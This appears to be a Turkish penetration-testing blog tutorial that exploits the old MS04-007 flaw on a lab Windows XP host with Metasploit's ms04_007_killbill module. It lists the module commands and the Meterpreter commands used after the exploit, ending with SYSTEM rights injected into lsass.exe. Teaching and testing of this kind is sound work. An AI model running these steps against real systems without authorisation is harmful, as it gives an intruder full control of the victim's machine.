MSF ms04_007_killbill İstismar Modülü ile İşletim Sistemi Zafiyetin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows XP SPO işletim sisteminde MS04-007 zafiyetinin Metasploit Framework ile istismar edilecek ve SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS04-007 zafiyetinin tespit edildiği görülmektedir.

acquiring-meterpreter-shell-on-windows-by-using-msf-ms04-007-killbill-module-01

Metasploit üzerinde ilgili modülün (MSF ms04_007_killbill istismar modülü) seçenekleri aşağıdaki gibidir:

search ms04-007
use exploit/windows/smb/ms04_007_killbill
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-ms04-007-killbill-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.

set RHOST 192.168.244.138
show options
exploit

acquiring-meterpreter-shell-on-windows-by-using-msf-ms04-007-killbill-module-03

Modül çalıştırıldığında SYSTEM haklarıyla lsass.exe prosesine enjekte olunduğu görülmektedir.

sysinfo
getuid
getpid
ps

acquiring-meterpreter-shell-on-windows-by-using-msf-ms04-007-killbill-module-04

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.